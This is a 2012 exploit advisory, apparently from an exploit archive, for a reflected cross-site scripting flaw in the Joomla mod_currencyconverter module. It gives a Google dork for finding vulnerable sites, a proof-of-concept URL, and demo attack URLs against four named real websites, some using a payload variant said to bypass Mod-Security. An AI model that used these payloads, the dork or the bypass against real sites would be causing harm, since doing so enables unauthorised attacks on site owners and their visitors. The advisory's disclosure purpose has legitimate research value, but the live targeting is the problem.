# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~ 
 
~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]

   ------------- ( Demo Vulnerability ) ~ 
  
   Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
   
   Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
 
   Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
   
   Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
   
   
Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
  

 Timeline:
~~~~~~~~~
- 29 - 01 - 2012 bug found.
- 01 - 02 - 2012 vendor contacted, but no response.
- 02 - 02 - 2012 Advisories release.
 
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | Cru3l.b0y | ArYaIeIrAN | NoL1m1t | G3n3Rall
 
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | md.r00t And All My Friendz
 
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [Pentesters.ir] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------